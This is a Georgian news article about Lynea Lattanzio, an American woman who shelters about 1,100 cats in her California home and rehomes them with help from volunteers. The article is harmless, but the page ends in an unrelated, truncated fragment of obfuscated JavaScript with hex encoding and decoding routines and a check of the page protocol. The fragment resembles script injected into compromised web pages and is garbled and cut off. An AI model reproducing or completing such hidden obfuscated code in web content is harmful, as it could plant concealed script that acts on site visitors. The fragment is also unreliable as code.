1100 კატა და ერთი ქალბატონი (+ვიდეო)
1100 კატა და ერთი ქალბატონი (+ვიდეო)
კალიფორნიაში მარშაკის ზღაპარი "კატების სახლი" სინამდვილედ იქცა. 67 წლის ამერიკელი ქალბატონის სახლს თავი 1100-მა კატამ შეაფარა.

ენერგიული და ექსცენტრული ამერიკელი ლინი ლატტანზიო კატების სახლის დამაარსებელი და ჩვენი დროის გმირია. მისი დახმარებით, კატები ჯერ ლინის სახლს აფარებენ თავს, შემდეგ კი, დროთა განმავლობაში ახალ პატრონს პოულობენ.

კატების სახლში 800 დიდი კატა და 300 კნუტი ცხოვრობს. ლინის ამ ცხოველების დამოუკიდებლობა და გრაციოზულობა მოსწონს. სახლის დიასახლისის თქმით, მთელი ცხოვრების მანძილზე მან 28 000 ულვაშებიანი ბინადარი შეიფარა. თავშესაფრის ისტორია 14 წლის წინ დაიწყო, როდესაც ლინის
მამამ სთხოვა მარტოობისგან თავის დასაღწევად მისთვის ორი შინაური ცხოველი მიეყვანა. ქალი თავშესაფარში წავიდა და იქიდან 15
კნუტი აიყვანა. წლის ბოლომდე კი მან შეიფარა და ახალ პატრონებზე გააჩუქა 96 კატა. ქალი მიხვდა, რომ ამგვარი ქველმოქმედება მისი მოწოდებაა და გააგრძელა უსახლკარო ცხოველების მოვლა. სახლში კატების თავშესაფრის ორგანიზებისთვის, ლენის ვეტერინარულ კურსებზე სიარული მოუწია.

სულ ცოტა ხნის წინ კატების სახლში მოხალისეთა ჯგუფი გაჩნდა იმის გამო, რომ იქ მცხოვრებთა რიცხვმა იმატა. ადამიანები თავისი სურვილით ეხმარებიან ლენს - აჭმევენ კატებს, ალაგებენ იქაურობას, საჭიროების შემთხვევაში უწევენ ვეტერინარულ დახმარებას. ამ კეთილი ქალბატონის კატების მიმართ დიდი სიყვარულის მიუხედავად, მისი მთავარი დანიშნულება კატებისთვის მზრუნველი და მოსიყვარულე პატრონების პოვნაა.

იხილეთ ვიდეო
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e